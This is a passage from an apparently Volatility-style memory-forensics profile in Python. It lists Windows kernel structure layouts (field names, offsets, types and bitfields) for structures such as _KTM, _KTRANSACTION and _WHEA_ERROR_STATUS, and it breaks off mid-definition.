'PhysicalAddress' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long long')]],
'PhysicalAddressMask' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long long')]],
'Node' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long long')]],
'Card' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long long')]],
'Module' : [ 0x0, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long long')]],
'Bank' : [ 0x0, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned long long')]],
'Device' : [ 0x0, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned long long')]],
'Row' : [ 0x0, ['BitField', dict(start_bit = 8, end_bit = 9, native_type='unsigned long long')]],
'Column' : [ 0x0, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned long long')]],
'BitPosition' : [ 0x0, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned long long')]],
'RequesterId' : [ 0x0, ['BitField', dict(start_bit = 11, end_bit = 12, native_type='unsigned long long')]],
'ResponderId' : [ 0x0, ['BitField', dict(start_bit = 12, end_bit = 13, native_type='unsigned long long')]],
'TargetId' : [ 0x0, ['BitField', dict(start_bit = 13, end_bit = 14, native_type='unsigned long long')]],
'ErrorType' : [ 0x0, ['BitField', dict(start_bit = 14, end_bit = 15, native_type='unsigned long long')]],
'Reserved' : [ 0x0, ['BitField', dict(start_bit = 15, end_bit = 64, native_type='unsigned long long')]],
'ValidBits' : [ 0x0, ['unsigned long long']],
} ],
'_RELATION_LIST_ENTRY' : [ 0xc, {
'Count' : [ 0x0, ['unsigned long']],
'MaxCount' : [ 0x4, ['unsigned long']],
'Devices' : [ 0x8, ['array', 1, ['pointer', ['_DEVICE_OBJECT']]]],
} ],
'_HEAP_FREE_ENTRY_EXTRA' : [ 0x4, {
'TagIndex' : [ 0x0, ['unsigned short']],
'FreeBackTraceIndex' : [ 0x2, ['unsigned short']],
} ],
'_VI_DEADLOCK_GLOBALS' : [ 0x40e0, {
'TimeAcquire' : [ 0x0, ['long long']],
'TimeRelease' : [ 0x8, ['long long']],
'ResourceDatabase' : [ 0x10, ['pointer', ['_LIST_ENTRY']]],
'ResourceDatabaseCount' : [ 0x14, ['unsigned long']],
'ResourceAddressRange' : [ 0x18, ['array', 1023, ['_VF_ADDRESS_RANGE']]],
'ThreadDatabase' : [ 0x2010, ['pointer', ['_LIST_ENTRY']]],
'ThreadDatabaseCount' : [ 0x2014, ['unsigned long']],
'ThreadAddressRange' : [ 0x2018, ['array', 1023, ['_VF_ADDRESS_RANGE']]],
'AllocationFailures' : [ 0x4010, ['unsigned long']],
'NodesTrimmedBasedOnAge' : [ 0x4014, ['unsigned long']],
'NodesTrimmedBasedOnCount' : [ 0x4018, ['unsigned long']],
'NodesSearched' : [ 0x401c, ['unsigned long']],
'MaxNodesSearched' : [ 0x4020, ['unsigned long']],
'SequenceNumber' : [ 0x4024, ['unsigned long']],
'RecursionDepthLimit' : [ 0x4028, ['unsigned long']],
'SearchedNodesLimit' : [ 0x402c, ['unsigned long']],
'DepthLimitHits' : [ 0x4030, ['unsigned long']],
'SearchLimitHits' : [ 0x4034, ['unsigned long']],
'ABC_ACB_Skipped' : [ 0x4038, ['unsigned long']],
'OutOfOrderReleases' : [ 0x403c, ['unsigned long']],
'NodesReleasedOutOfOrder' : [ 0x4040, ['unsigned long']],
'TotalReleases' : [ 0x4044, ['unsigned long']],
'RootNodesDeleted' : [ 0x4048, ['unsigned long']],
'ForgetHistoryCounter' : [ 0x404c, ['unsigned long']],
'Instigator' : [ 0x4050, ['pointer', ['void']]],
'NumberOfParticipants' : [ 0x4054, ['unsigned long']],
'Participant' : [ 0x4058, ['array', 32, ['pointer', ['_VI_DEADLOCK_NODE']]]],
'ChildrenCountWatermark' : [ 0x40d8, ['long']],
} ],
'_KTM' : [ 0x238, {
'cookie' : [ 0x0, ['unsigned long']],
'Mutex' : [ 0x4, ['_KMUTANT']],
'State' : [ 0x24, ['Enumeration', dict(target = 'long', choices = {0: 'KKtmUninitialized', 1: 'KKtmInitialized', 2: 'KKtmRecovering', 3: 'KKtmOnline', 4: 'KKtmRecoveryFailed', 5: 'KKtmOffline'})]],
'NamespaceLink' : [ 0x28, ['_KTMOBJECT_NAMESPACE_LINK']],
'TmIdentity' : [ 0x3c, ['_GUID']],
'Flags' : [ 0x4c, ['unsigned long']],
'VolatileFlags' : [ 0x50, ['unsigned long']],
'LogFileName' : [ 0x54, ['_UNICODE_STRING']],
'LogFileObject' : [ 0x5c, ['pointer', ['_FILE_OBJECT']]],
'MarshallingContext' : [ 0x60, ['pointer', ['void']]],
'LogManagementContext' : [ 0x64, ['pointer', ['void']]],
'Transactions' : [ 0x68, ['_KTMOBJECT_NAMESPACE']],
'ResourceManagers' : [ 0xc8, ['_KTMOBJECT_NAMESPACE']],
'LsnOrderedMutex' : [ 0x128, ['_KMUTANT']],
'LsnOrderedList' : [ 0x148, ['_LIST_ENTRY']],
'CommitVirtualClock' : [ 0x150, ['_LARGE_INTEGER']],
'CommitVirtualClockMutex' : [ 0x158, ['_FAST_MUTEX']],
'BaseLsn' : [ 0x178, ['_CLS_LSN']],
'CurrentReadLsn' : [ 0x180, ['_CLS_LSN']],
'LastRecoveredLsn' : [ 0x188, ['_CLS_LSN']],
'TmRmHandle' : [ 0x190, ['pointer', ['void']]],
'TmRm' : [ 0x194, ['pointer', ['_KRESOURCEMANAGER']]],
'LogFullNotifyEvent' : [ 0x198, ['_KEVENT']],
'CheckpointWorkItem' : [ 0x1a8, ['_WORK_QUEUE_ITEM']],
'CheckpointTargetLsn' : [ 0x1b8, ['_CLS_LSN']],
'LogFullCompletedWorkItem' : [ 0x1c0, ['_WORK_QUEUE_ITEM']],
'LogWriteResource' : [ 0x1d0, ['_ERESOURCE']],
'LogFlags' : [ 0x208, ['unsigned long']],
'LogFullStatus' : [ 0x20c, ['long']],
'RecoveryStatus' : [ 0x210, ['long']],
'LastCheckBaseLsn' : [ 0x218, ['_CLS_LSN']],
'RestartOrderedList' : [ 0x220, ['_LIST_ENTRY']],
'OfflineWorkItem' : [ 0x228, ['_WORK_QUEUE_ITEM']],
} ],
'_CONFIGURATION_COMPONENT' : [ 0x24, {
'Class' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'SystemClass', 1: 'ProcessorClass', 2: 'CacheClass', 3: 'AdapterClass', 4: 'ControllerClass', 5: 'PeripheralClass', 6: 'MemoryClass', 7: 'MaximumClass'})]],
'Type' : [ 0x4, ['Enumeration', dict(target = 'long', choices = {0: 'ArcSystem', 1: 'CentralProcessor', 2: 'FloatingPointProcessor', 3: 'PrimaryIcache', 4: 'PrimaryDcache', 5: 'SecondaryIcache', 6: 'SecondaryDcache', 7: 'SecondaryCache', 8: 'EisaAdapter', 9: 'TcAdapter', 10: 'ScsiAdapter', 11: 'DtiAdapter', 12: 'MultiFunctionAdapter', 13: 'DiskController', 14: 'TapeController', 15: 'CdromController', 16: 'WormController', 17: 'SerialController', 18: 'NetworkController', 19: 'DisplayController', 20: 'ParallelController', 21: 'PointerController', 22: 'KeyboardController', 23: 'AudioController', 24: 'OtherController', 25: 'DiskPeripheral', 26: 'FloppyDiskPeripheral', 27: 'TapePeripheral', 28: 'ModemPeripheral', 29: 'MonitorPeripheral', 30: 'PrinterPeripheral', 31: 'PointerPeripheral', 32: 'KeyboardPeripheral', 33: 'TerminalPeripheral', 34: 'OtherPeripheral', 35: 'LinePeripheral', 36: 'NetworkPeripheral', 37: 'SystemMemory', 38: 'DockingInformation', 39: 'RealModeIrqRoutingTable', 40: 'RealModePCIEnumeration', 41: 'MaximumType'})]],
'Flags' : [ 0x8, ['_DEVICE_FLAGS']],
'Version' : [ 0xc, ['unsigned short']],
'Revision' : [ 0xe, ['unsigned short']],
'Key' : [ 0x10, ['unsigned long']],
'AffinityMask' : [ 0x14, ['unsigned long']],
'Group' : [ 0x14, ['unsigned short']],
'GroupIndex' : [ 0x16, ['unsigned short']],
'ConfigurationDataLength' : [ 0x18, ['unsigned long']],
'IdentifierLength' : [ 0x1c, ['unsigned long']],
'Identifier' : [ 0x20, ['pointer', ['unsigned char']]],
} ],
'_VF_BTS_RECORD' : [ 0xc, {
'JumpedFrom' : [ 0x0, ['pointer', ['void']]],
'JumpedTo' : [ 0x4, ['pointer', ['void']]],
'Unused1' : [ 0x8, ['BitField', dict(start_bit = 0, end_bit = 3, native_type='unsigned long')]],
'Predicted' : [ 0x8, ['BitField', dict(start_bit = 3, end_bit = 7, native_type='unsigned long')]],
'Unused2' : [ 0x8, ['BitField', dict(start_bit = 7, end_bit = 32, native_type='unsigned long')]],
} ],
'_KTRANSACTION' : [ 0x1e0, {
'OutcomeEvent' : [ 0x0, ['_KEVENT']],
'cookie' : [ 0x10, ['unsigned long']],
'Mutex' : [ 0x14, ['_KMUTANT']],
'TreeTx' : [ 0x34, ['pointer', ['_KTRANSACTION']]],
'GlobalNamespaceLink' : [ 0x38, ['_KTMOBJECT_NAMESPACE_LINK']],
'TmNamespaceLink' : [ 0x4c, ['_KTMOBJECT_NAMESPACE_LINK']],
'UOW' : [ 0x60, ['_GUID']],
'State' : [ 0x70, ['Enumeration', dict(target = 'long', choices = {0: 'KTransactionUninitialized', 1: 'KTransactionActive', 2: 'KTransactionPreparing', 3: 'KTransactionPrepared', 4: 'KTransactionInDoubt', 5: 'KTransactionCommitted', 6: 'KTransactionAborted', 7: 'KTransactionDelegated', 8: 'KTransactionPrePreparing', 9: 'KTransactionForgotten', 10: 'KTransactionRecovering', 11: 'KTransactionPrePrepared'})]],
'Flags' : [ 0x74, ['unsigned long']],
'EnlistmentHead' : [ 0x78, ['_LIST_ENTRY']],
'EnlistmentCount' : [ 0x80, ['unsigned long']],
'RecoverableEnlistmentCount' : [ 0x84, ['unsigned long']],
'PrePrepareRequiredEnlistmentCount' : [ 0x88, ['unsigned long']],
'PrepareRequiredEnlistmentCount' : [ 0x8c, ['unsigned long']],
'OutcomeRequiredEnlistmentCount' : [ 0x90, ['unsigned long']],
'PendingResponses' : [ 0x94, ['unsigned long']],
'SuperiorEnlistment' : [ 0x98, ['pointer', ['_KENLISTMENT']]],
'LastLsn' : [ 0xa0, ['_CLS_LSN']],
'PromotedEntry' : [ 0xa8, ['_LIST_ENTRY']],
'PromoterTransaction' : [ 0xb0, ['pointer', ['_KTRANSACTION']]],
'PromotePropagation' : [ 0xb4, ['pointer', ['void']]],
'IsolationLevel' : [ 0xb8, ['unsigned long']],
'IsolationFlags' : [ 0xbc, ['unsigned long']],
'Timeout' : [ 0xc0, ['_LARGE_INTEGER']],
'Description' : [ 0xc8, ['_UNICODE_STRING']],
'RollbackThread' : [ 0xd0, ['pointer', ['_KTHREAD']]],
'RollbackWorkItem' : [ 0xd4, ['_WORK_QUEUE_ITEM']],
'RollbackDpc' : [ 0xe4, ['_KDPC']],
'RollbackTimer' : [ 0x108, ['_KTIMER']],
'LsnOrderedEntry' : [ 0x130, ['_LIST_ENTRY']],
'Outcome' : [ 0x138, ['Enumeration', dict(target = 'long', choices = {0: 'KTxOutcomeUninitialized', 1: 'KTxOutcomeUndetermined', 2: 'KTxOutcomeCommitted', 3: 'KTxOutcomeAborted', 4: 'KTxOutcomeUnavailable'})]],
'Tm' : [ 0x13c, ['pointer', ['_KTM']]],
'CommitReservation' : [ 0x140, ['long long']],
'TransactionHistory' : [ 0x148, ['array', 10, ['_KTRANSACTION_HISTORY']]],
'TransactionHistoryCount' : [ 0x198, ['unsigned long']],
'DTCPrivateInformation' : [ 0x19c, ['pointer', ['void']]],
'DTCPrivateInformationLength' : [ 0x1a0, ['unsigned long']],
'DTCPrivateInformationMutex' : [ 0x1a4, ['_KMUTANT']],
'PromotedTxSelfHandle' : [ 0x1c4, ['pointer', ['void']]],
'PendingPromotionCount' : [ 0x1c8, ['unsigned long']],
'PromotionCompletedEvent' : [ 0x1cc, ['_KEVENT']],
} ],
'_PRIVATE_CACHE_MAP_FLAGS' : [ 0x4, {
'DontUse' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 16, native_type='unsigned long')]],
'ReadAheadActive' : [ 0x0, ['BitField', dict(start_bit = 16, end_bit = 17, native_type='unsigned long')]],
'ReadAheadEnabled' : [ 0x0, ['BitField', dict(start_bit = 17, end_bit = 18, native_type='unsigned long')]],
'PagePriority' : [ 0x0, ['BitField', dict(start_bit = 18, end_bit = 21, native_type='unsigned long')]],
'Available' : [ 0x0, ['BitField', dict(start_bit = 21, end_bit = 32, native_type='unsigned long')]],
} ],
'_CM_KCB_UOW' : [ 0x38, {
'TransactionListEntry' : [ 0x0, ['_LIST_ENTRY']],
'KCBLock' : [ 0x8, ['pointer', ['_CM_INTENT_LOCK']]],
'KeyLock' : [ 0xc, ['pointer', ['_CM_INTENT_LOCK']]],
'KCBListEntry' : [ 0x10, ['_LIST_ENTRY']],
'KeyControlBlock' : [ 0x18, ['pointer', ['_CM_KEY_CONTROL_BLOCK']]],
'Transaction' : [ 0x1c, ['pointer', ['_CM_TRANS']]],
'UoWState' : [ 0x20, ['unsigned long']],
'ActionType' : [ 0x24, ['Enumeration', dict(target = 'long', choices = {0: 'UoWAddThisKey', 1: 'UoWAddChildKey', 2: 'UoWDeleteThisKey', 3: 'UoWDeleteChildKey', 4: 'UoWSetValueNew', 5: 'UoWSetValueExisting', 6: 'UoWDeleteValue', 7: 'UoWSetKeyUserFlags', 8: 'UoWSetLastWriteTime', 9: 'UoWSetSecurityDescriptor', 10: 'UoWRenameSubKey', 11: 'UoWRenameOldSubKey', 12: 'UoWRenameNewSubKey', 13: 'UoWIsolation', 14: 'UoWInvalid'})]],
'StorageType' : [ 0x28, ['Enumeration', dict(target = 'long', choices = {0: 'Stable', 1: 'Volatile', 2: 'InvalidStorage'})]],
'ChildKCB' : [ 0x30, ['pointer', ['_CM_KEY_CONTROL_BLOCK']]],
'VolatileKeyCell' : [ 0x30, ['unsigned long']],
'OldValueCell' : [ 0x30, ['unsigned long']],
'NewValueCell' : [ 0x34, ['unsigned long']],
'UserFlags' : [ 0x30, ['unsigned long']],
'LastWriteTime' : [ 0x30, ['_LARGE_INTEGER']],
'TxSecurityCell' : [ 0x30, ['unsigned long']],
'OldChildKCB' : [ 0x30, ['pointer', ['_CM_KEY_CONTROL_BLOCK']]],
'NewChildKCB' : [ 0x34, ['pointer', ['_CM_KEY_CONTROL_BLOCK']]],
'OtherChildKCB' : [ 0x30, ['pointer', ['_CM_KEY_CONTROL_BLOCK']]],
'ThisVolatileKeyCell' : [ 0x34, ['unsigned long']],
} ],
'_KPROCESSOR_STATE' : [ 0x320, {
'ContextFrame' : [ 0x0, ['_CONTEXT']],
'SpecialRegisters' : [ 0x2cc, ['_KSPECIAL_REGISTERS']],
} ],
'_MMPTE_TRANSITION' : [ 0x4, {
'Valid' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Write' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'Owner' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'WriteThrough' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'CacheDisable' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'Protection' : [ 0x0, ['BitField', dict(start_bit = 5, end_bit = 10, native_type='unsigned long')]],
'Prototype' : [ 0x0, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned long')]],
'Transition' : [ 0x0, ['BitField', dict(start_bit = 11, end_bit = 12, native_type='unsigned long')]],
'PageFrameNumber' : [ 0x0, ['BitField', dict(start_bit = 12, end_bit = 32, native_type='unsigned long')]],
} ],
'_VF_WATCHDOG_IRP' : [ 0x14, {
'ListEntry' : [ 0x0, ['_LIST_ENTRY']],
'Irp' : [ 0x8, ['pointer', ['_IRP']]],
'DueTickCount' : [ 0xc, ['unsigned long']],
'Inserted' : [ 0x10, ['unsigned char']],
'TrackedStackLocation' : [ 0x11, ['unsigned char']],
'CancelTimeoutTicks' : [ 0x12, ['unsigned short']],
} ],
'_flags' : [ 0x1, {
'Removable' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'GroupAssigned' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned char')]],
'GroupCommitted' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned char')]],
'GroupAssignmentFixed' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned char')]],
'Fill' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 8, native_type='unsigned char')]],
} ],
'__unnamed_2270' : [ 0x8, {
'Head' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 24, native_type='unsigned long long')]],
'Tail' : [ 0x0, ['BitField', dict(start_bit = 24, end_bit = 48, native_type='unsigned long long')]],
'ActiveThreadCount' : [ 0x0, ['BitField', dict(start_bit = 48, end_bit = 64, native_type='unsigned long long')]],
} ],
'__unnamed_2272' : [ 0x8, {
's1' : [ 0x0, ['__unnamed_2270']],
'Value' : [ 0x0, ['unsigned long long']],
} ],
'_ALPC_COMPLETION_LIST_STATE' : [ 0x8, {
'u1' : [ 0x0, ['__unnamed_2272']],
} ],
'_PSP_CPU_SHARE_CAPTURED_WEIGHT_DATA' : [ 0x8, {
'CapturedCpuShareWeight' : [ 0x0, ['unsigned long']],
'CapturedTotalWeight' : [ 0x4, ['unsigned long']],
'CombinedData' : [ 0x0, ['long long']],
} ],
'_CM_NAME_HASH' : [ 0xc, {
'ConvKey' : [ 0x0, ['unsigned long']],
'NextHash' : [ 0x4, ['pointer', ['_CM_NAME_HASH']]],
'NameLength' : [ 0x8, ['unsigned short']],
'Name' : [ 0xa, ['array', 1, ['wchar']]],
} ],
'_PROC_IDLE_STATE_BUCKET' : [ 0x20, {
'TotalTime' : [ 0x0, ['unsigned long long']],
'MinTime' : [ 0x8, ['unsigned long long']],
'MaxTime' : [ 0x10, ['unsigned long long']],
'Count' : [ 0x18, ['unsigned long']],
} ],
'_MMSECURE_FLAGS' : [ 0x4, {
'ReadOnly' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'NoWrite' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'Spare' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 12, native_type='unsigned long')]],
} ],
'_PO_IRP_QUEUE' : [ 0x8, {
'CurrentIrp' : [ 0x0, ['pointer', ['_IRP']]],
'PendingIrpList' : [ 0x4, ['pointer', ['_IRP']]],
} ],
'__unnamed_2285' : [ 0x4, {
'Active' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'OnlyTryAcquireUsed' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'ReleasedOutOfOrder' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'SequenceNumber' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 32, native_type='unsigned long')]],
'Whole' : [ 0x0, ['unsigned long']],
} ],
'_VI_DEADLOCK_NODE' : [ 0x6c, {
'Parent' : [ 0x0, ['pointer', ['_VI_DEADLOCK_NODE']]],
'ChildrenList' : [ 0x4, ['_LIST_ENTRY']],
'SiblingsList' : [ 0xc, ['_LIST_ENTRY']],
'ResourceList' : [ 0x14, ['_LIST_ENTRY']],
'FreeListEntry' : [ 0x14, ['_LIST_ENTRY']],
'Root' : [ 0x1c, ['pointer', ['_VI_DEADLOCK_RESOURCE']]],
'ThreadEntry' : [ 0x20, ['pointer', ['_VI_DEADLOCK_THREAD']]],
'u1' : [ 0x24, ['__unnamed_2285']],
'ChildrenCount' : [ 0x28, ['long']],
'StackTrace' : [ 0x2c, ['array', 8, ['pointer', ['void']]]],
'ParentStackTrace' : [ 0x4c, ['array', 8, ['pointer', ['void']]]],
} ],
'PROCESSOR_IDLESTATE_INFO' : [ 0x8, {
'TimeCheck' : [ 0x0, ['unsigned long']],
'DemotePercent' : [ 0x4, ['unsigned char']],
'PromotePercent' : [ 0x5, ['unsigned char']],
'Spare' : [ 0x6, ['array', 2, ['unsigned char']]],
} ],
'_KTMOBJECT_NAMESPACE' : [ 0x60, {
'Table' : [ 0x0, ['_RTL_AVL_TABLE']],
'Mutex' : [ 0x38, ['_KMUTANT']],
'LinksOffset' : [ 0x58, ['unsigned short']],
'GuidOffset' : [ 0x5a, ['unsigned short']],
'Expired' : [ 0x5c, ['unsigned char']],
} ],
'_LPCP_PORT_QUEUE' : [ 0x10, {
'NonPagedPortQueue' : [ 0x0, ['pointer', ['_LPCP_NONPAGED_PORT_QUEUE']]],
'Semaphore' : [ 0x4, ['pointer', ['_KSEMAPHORE']]],
'ReceiveHead' : [ 0x8, ['_LIST_ENTRY']],
} ],
'_CM_KEY_REFERENCE' : [ 0x8, {
'KeyCell' : [ 0x0, ['unsigned long']],
'KeyHive' : [ 0x4, ['pointer', ['_HHIVE']]],
} ],
'SYSTEM_POWER_LEVEL' : [ 0x18, {
'Enable' : [ 0x0, ['unsigned char']],
'Spare' : [ 0x1, ['array', 3, ['unsigned char']]],
'BatteryLevel' : [ 0x4, ['unsigned long']],
'PowerPolicy' : [ 0x8, ['POWER_ACTION_POLICY']],
'MinSystemState' : [ 0x14, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
} ],
'_OBJECT_DUMP_CONTROL' : [ 0x8, {
'Stream' : [ 0x0, ['pointer', ['void']]],
'Detail' : [ 0x4, ['unsigned long']],
} ],
'_VF_ADDRESS_RANGE' : [ 0x8, {
'Start' : [ 0x0, ['pointer', ['unsigned char']]],
'End' : [ 0x4, ['pointer', ['unsigned char']]],
} ],
'_OBJECT_SYMBOLIC_LINK' : [ 0x18, {
'CreationTime' : [ 0x0, ['_LARGE_INTEGER']],
'LinkTarget' : [ 0x8, ['_UNICODE_STRING']],
'DosDeviceDriveIndex' : [ 0x10, ['unsigned long']],
} ],
'_LPCP_NONPAGED_PORT_QUEUE' : [ 0x18, {
'Semaphore' : [ 0x0, ['_KSEMAPHORE']],
'BackPointer' : [ 0x14, ['pointer', ['_LPCP_PORT_OBJECT']]],
} ],
'_KRESOURCEMANAGER_COMPLETION_BINDING' : [ 0x14, {
'NotificationListHead' : [ 0x0, ['_LIST_ENTRY']],
'Port' : [ 0x8, ['pointer', ['void']]],
'Key' : [ 0xc, ['unsigned long']],
'BindingProcess' : [ 0x10, ['pointer', ['_EPROCESS']]],
} ],
'_VF_TRACKER' : [ 0x10, {
'TrackerFlags' : [ 0x0, ['unsigned long']],
'TrackerSize' : [ 0x4, ['unsigned long']],
'TrackerIndex' : [ 0x8, ['unsigned long']],
'TraceDepth' : [ 0xc, ['unsigned long']],
} ],
'_CALL_PERFORMANCE_DATA' : [ 0x204, {
'SpinLock' : [ 0x0, ['unsigned long']],
'HashTable' : [ 0x4, ['array', 64, ['_LIST_ENTRY']]],
} ],
'_ARBITER_ALTERNATIVE' : [ 0x38, {
'Minimum' : [ 0x0, ['unsigned long long']],
'Maximum' : [ 0x8, ['unsigned long long']],
'Length' : [ 0x10, ['unsigned long long']],
'Alignment' : [ 0x18, ['unsigned long long']],
'Priority' : [ 0x20, ['long']],
'Flags' : [ 0x24, ['unsigned long']],
'Descriptor' : [ 0x28, ['pointer', ['_IO_RESOURCE_DESCRIPTOR']]],
'Reserved' : [ 0x2c, ['array', 3, ['unsigned long']]],
} ],
'_WHEA_ERROR_STATUS' : [ 0x8, {
'ErrorStatus' : [ 0x0, ['unsigned long long']],
'Reserved1' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 8, native_type='unsigned long long')]],
'ErrorType' : [ 0x0, ['BitField', dict(start_bit = 8, end_bit = 16, native_type='unsigned long long')]],
'Address' : [ 0x0, ['BitField', dict(start_bit = 16, end_bit = 17, native_type='unsigned long long')]],
'Control' : [ 0x0, ['BitField', dict(start_bit = 17, end_bit = 18, native_type='unsigned long long')]],
'Data' : [ 0x0, ['BitField', dict(start_bit = 18, end_bit = 19, native_type='unsigned long long')]],
'Responder' : [ 0x0, ['BitField', dict(start_bit = 19, end_bit = 20, native_type='unsigned long long')]],
'Requester' : [ 0x0, ['BitField', dict(start_bit = 20, end_bit = 21, native_type='unsigned long long')]],
'FirstError' : [ 0x0, ['BitField', dict(start_bit = 21, end_bit = 22, native_type='unsigned long long')]],
'Overflow' : [ 0x0, ['BitField', dict(start_bit = 22, end_bit = 23, native_type='unsigned long long')]],
'Reserved2' : [ 0x0, ['BitField', dict(start_bit = 23, end_bit = 64, native_type='unsigned long long')]],
} ],
'_WHEA_PERSISTENCE_INFO' : [ 0x8, {
'Signature' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 16, native_type='unsigned long long')]],
'Length' : [ 0x0, ['BitField', dict(start_bit = 16, end_bit = 40, native_type='unsigned long long')]],
'Identifier' : [ 0x0, ['BitField', dict(start_bit = 40, end_bit = 56, native_type='unsigned long long')]],
'Attributes' : [ 0x0, ['BitField', dict(start_bit = 56, end_bit = 58, native_type='unsigned long long')]],
'DoNotLog' : [ 0x0, ['BitField', dict(start_bit = 58, end_bit = 59, native_type='unsigned long long')]],
'Reserved' : [ 0x0, ['BitField', dict(start_bit = 59, end_bit = 64, native_type='unsigned long long')]],
'AsULONGLONG' : [ 0x0, ['unsigned long long']],
} ],
'_MI_SECTION_IMAGE_INFORMATION' : [ 0x38, {
'ExportedImageInformation' : [ 0x0, ['_SECTION_IMAGE_INFORMATION']],
'InternalImageInformation' : [ 0x30, ['_MI_EXTRA_IMAGE_INFORMATION']],
} ],
'_HEAP_USERDATA_HEADER' : [ 0x10, {
'SFreeListEntry' : [ 0x0, ['_SINGLE_LIST_ENTRY']],
'SubSegment' : [ 0x0, ['pointer', ['_HEAP_SUBSEGMENT']]],
'Reserved' : [ 0x4, ['pointer', ['void']]],
'SizeIndex' : [ 0x8, ['unsigned long']],
'Signature' : [ 0xc, ['unsigned long']],
} ],
'_STACK_TABLE' : [ 0x8040, {
'NumStackTraces' : [ 0x0, ['unsigned short']],
'TraceCapacity' : [ 0x2, ['unsigned short']],
'StackTrace' : [ 0x4, ['array', 16, ['pointer', ['_OBJECT_REF_TRACE']]]],
'StackTableHash' : [ 0x44, ['array', 16381, ['unsigned short']]],
} ],
'_TOKEN_CONTROL' : [ 0x28, {
'TokenId' : [ 0x0, ['_LUID']],
'AuthenticationId' : [ 0x8, ['_LUID']],
'ModifiedId' : [ 0x10, ['_LUID']],
'TokenSource' : [ 0x18, ['_TOKEN_SOURCE']],
} ],
'_DEFERRED_WRITE' : [ 0x24, {
'NodeTypeCode' : [ 0x0, ['short']],
'NodeByteSize' : [ 0x2, ['short']],
'FileObject' : [ 0x4, ['pointer', ['_FILE_OBJECT']]],
'BytesToWrite' : [ 0x8, ['unsigned long']],
'DeferredWriteLinks' : [ 0xc, ['_LIST_ENTRY']],
'Event' : [ 0x14, ['pointer', ['_KEVENT']]],
'PostRoutine' : [ 0x18, ['pointer', ['void']]],
'Context1' : [ 0x1c, ['pointer', ['void']]],
'Context2' : [ 0x20, ['pointer', ['void']]],
} ],
'_ARBITER_ORDERING_LIST' : [ 0x8, {
'Count' : [ 0x0, ['unsigned short']],
'Maximum' : [ 0x2, ['unsigned short']],
'Orderings' : [ 0x4, ['pointer', ['_ARBITER_ORDERING']]],
} ],
'_SECTION_IMAGE_INFORMATION' : [ 0x30, {
'TransferAddress' : [ 0x0, ['pointer', ['void']]],
'ZeroBits' : [ 0x4, ['unsigned long']],
'MaximumStackSize' : [ 0x8, ['unsigned long']],
'CommittedStackSize' : [ 0xc, ['unsigned long']],
'SubSystemType' : [ 0x10, ['unsigned long']],
'SubSystemMinorVersion' : [ 0x14, ['unsigned short']],
'SubSystemMajorVersion' : [ 0x16, ['unsigned short']],
'SubSystemVersion' : [ 0x14, ['unsigned long']],
'GpValue' : [ 0x18, ['unsigned long']],
'ImageCharacteristics' : [ 0x1c, ['unsigned short']],
'DllCharacteristics' : [ 0x1e, ['unsigned short']],
'Machine' : [ 0x20, ['unsigned short']],
'ImageContainsCode' : [ 0x22, ['unsigned char']],
'ImageFlags' : [ 0x23, ['unsigned char']],
'ComPlusNativeReady' : [ 0x23, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'ComPlusILOnly' : [ 0x23, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned char')]],
'ImageDynamicallyRelocated' : [ 0x23, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned char')]],
'ImageMappedFlat' : [ 0x23, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned char')]],
'Reserved' : [ 0x23, ['BitField', dict(start_bit = 4, end_bit = 8, native_type='unsigned char')]],
'LoaderFlags' : [ 0x24, ['unsigned long']],
'ImageFileSize' : [ 0x28, ['unsigned long']],
'CheckSum' : [ 0x2c, ['unsigned long']],
} ],
'_VF_AVL_TABLE' : [ 0x3c, {
'RtlTable' : [ 0x0, ['_RTL_AVL_TABLE']],
'ReservedNode' : [ 0x38, ['pointer', ['_VF_AVL_TREE_NODE']]],
} ],
'_TOKEN_AUDIT_POLICY' : [ 0x1b, {
